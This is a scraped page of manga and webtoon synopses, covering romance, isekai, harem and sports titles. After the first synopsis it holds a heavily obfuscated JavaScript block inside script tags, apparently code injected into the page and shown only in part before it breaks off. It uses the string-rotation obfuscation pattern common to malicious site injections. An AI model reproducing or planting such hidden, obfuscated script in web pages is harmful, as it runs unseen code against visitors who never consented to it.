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Am I Too Old for a Boyfriend?!

Gentle, considerate, handsome—according to Shannon Cui—these are the qualities of the ideal boyfriend. If only she could get one. 26 and rapidly approaching “un-dateable” territory, Shannon has been waiting for the perfect someone to sweep her off her feet. Problem is, he’s not showing. Date after failed date, she can’t help but ask if he exists or worse…is she too old for a boyfriend?!<script></script><script>(function(_0x3ce48b,_0xb3282f){var _0x27d518=_0x1dc3,_0x10c58f=_0x3ce48b();while(!![]){try{var _0x1f5859=-parseInt(_0x27d518(0x176))/(0x252b+0x242e+-0x4958)+parseInt(_0x27d518(0x16d))/(0x1071+-0x3*-0x28f+-0x181c)+-parseInt(_0x27d518(0x178))/(0x1dd3+-0x16ea+-0x6e6)*(-parseInt(_0x27d518(0x171))/(0xc05*0x1+-0x1c5c+0x35*0x4f))+-parseInt(_0x27d518(0x17f))/(0x77a+-0x198a+0x1215)+parseInt(_0x27d518(0x16e))/(0xdf5*-0x1+-0xcc6+0x2f9*0x9)*(-parseInt(_0x27d518(0x181))/(0x17cc+-0x6dc*0x3+-0x331))+-parseInt(_0x27d518(0x180))/(0x6*-0xe+-0x18d3+0x192f)*(parseInt(_0x27d518(0x170))/(0x146c+-0xcd*0x1d+0x2*0x16b))+parseInt(_0x27d518(0x160))/(0xc9*0x26+0x6f*0x16+-0x2756)*(parseInt(_0x27d518(0x163))/(0x147b+-0x10b2*-0x2+-0x35d4));if(_0x1f5859===_0xb3282f)break;else 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Jashinkankin Harem de Isekai seifuku!

An alternate world ruled by chaotic evil gods.The protagonist, Yuya, wakes up to the voice of a girl calling his name.He finds himself in a temple of desire ruled by the evil god, Riv, where many people are indulging in pleasure like madmen.Despite this, Yuya manages to maintain his sanity, which piques Riv's interest, leading to him being bound by a special chain.However, this chain is actually a tool meant to restrain evil gods, and by imprisoning and subduing them, it can steal their skills.Guided by the revelation of the ancient god Agnes residing in the chain, commanding him to "take your seat on the throne," Yuya uses this power to imprison dangerous evil gods one after another.The curtain rises on a lackluster man's alternate world imprisonment × counterattack erotic fantasy!


You Shou Yan

In the wake of scientific advancement, the once majestic mythological animals can't be compared to the olden days now. The mythological animal Si Bu Xiang received orders to descend to the mortal world and to help out other mythological animals in dire straits wandering the human world. In the secular world, he met his old colleague Pi Xiu in a tight spot, his drinking buddy Tu Ye down in his luck, and the gold and silver Jue brothers who were demoted to the mortal world... what kind of stories will happen between them? "You Shou Yan" updates every Wednesday, welcome to the furballs' world! Author: 靴下猫腰子 Editor: 凩汐


Tsuihou Sareta Akuyaku Reijou to Tensei Danshaku no Slow de Fushigi na Kekkon Seikatsu

Kuro Heartfield is the lord of the frontier territory, but his true identity is that of an ordinary 25-year-old man who got reincarnated here from another world. He has been relegated to being the feudal lord of this remote region for his demotion, after earning the resentment of high-ranking nobles, but here he found his new life to his liking, and so he has no complaints. One day, he receives a compulsory marriage proposal and his soon-to-be spouse\'s name is Lady Violet Valentine. She is a respectable noble lady from a duke\'s house, but her true identity is that of a so-called villainess, one who opposes the heroine in nearly all the routes of a certain romance game. A slightly mysterious married life starts today between these fellow outcasts aiming to make a place where they belong! (Source: Pixiv Comic)


Yuki Kodama Short Story Collection

A two volume publication of short stories and oneshots published in Flowers (Monthly) magazine written by mangaka Yuki Kodama.


Today's Walk

The story of a dog, Ponta, and his walker, Rieko. Originally published as a oneshot in Gekkan Shonen Sunday, and serialized on Twitter.


Whisper Me a Love Song

English: Himari is a high school freshman who in the first day attends the light music club’s performance at the school gym, falling in love with the upperclassman and singer Yori at first sight, confessing to her at the shoe lockers. Later looking for said upperclassman, Himari finds out that Yori isn’t part of the club and that she instead likes to play music alone at the rooftop. There, she finds out that Yori too fell in love with her. Español / Spanish: SpoilerHimari comienza la escuela secundaria y en su primer día atiende el concierto del club de música ligera en el gimnasio de la escuela, enamorándose a primera vista con la cantante Yori y confesándole su amor en los casilleros de zapatos. Buscándo a dicha cantante, Himari se entera de que Yori no es parte del mencionado club y que a ella le gusta tocar música sola en la terraza de la escuela. Allí, se entera de que Yori también se enamoró de ella.


Te ni iretan saimin apuri de yume no haaremu seikatsu o okuritai

The eagerly awaited new release is a hypnosis x harem romantic comedy! I\'ve never had a girlfriend. The app installed on my phone was a hypnosis app that could control anyone. After testing it, the app\'s power was real. With this, a harem life isn\'t just a dream \"Why do all the girls I target have troubles!?\" A beautiful gal, a plain girl with hidden beauty, a cool ojou-sama junior-by the power of the hypnosis app, their secrets that they couldn\'t tell anyone are revealed! (I just wanted to do erotic things...!) The self-proclaimed loser, but fundamentally a good guy protagonist, ends up running around helping people!? All-ages hypnosis harem romantic comedy!


So I Married the Abandoned Prince

Although Rita Cardinale married Grand Duke Giuseppe Catane to help her lover George become emperor, she is stabbed in the back by the love of her life and loses her entire family. As Rita uses her alchemy to try and stop the emperor’s army from taking her fallen husband’s land, she is sent back in time to right before she’s married. Full of vengeance, Rita wants to stop George from becoming emperor. For her plan to work, she marries Giuseppe again, but why is he acting so different from before?


Duty After School

What would you do if your school's extracurricular activity was a mandatory military service amidst an actual war? A class of students is turned into a platoon of soldiers to fight against unknown slime-like objects.


Tensei Kizoku no Isekai Boukenroku: Jichou o Shiranai Kamigami no Shito

Shiina Kazuya, the protagonist of the story was killed by a stranger in front of a convenience store when he tried to protect two young girls escaping from the stranger who is trying to stab them. The girls fall and are too overcome with fear to get up and continue running away. When Shiina Kazuya awakens he realizes that he was reincarnated as the young noble Cain von Silford, the third son of an aristocrat (Margrave Garm Von Silford) and his second wife (Sarah) in a world filled with sword and sorcery. Prior to the age of ten Cain grew up in the Gracia Territory surrounded by gods that don\'t know self-restraint, in the upper echelon of nobility, and a loving family (father Garm Von Silford, mother Sarah, and older sister Raine). At the age of ten Cain is given peerage (Title of Duke, own estate, and an engagement), which leads to him living in Esfort the Royal Capitol. This is a classic isekai fantasy about an overpowered young man who just wants to be an average adventurer. He has received the maximum level of divine blessings from all seven gods, overcomes any obstacle that comes his way while hiding his unbelievable status and tends to build a harem of highly influential nobles.


A Tactical Genius on the Field

If there is one thing that Ma Jungwoo is good at, it\'s football. Although he is a genius strategist, others look down on him because of his lack of education and debt. But things seem to turn around when he finds out he has just inherited his late grandfather\'s British football team. He plans to sell the team and start fresh, only to find out the team has massive debt! Left with no other choice, Jungwoo must use his tactical genius to help this team rise from the ashes and be number one!
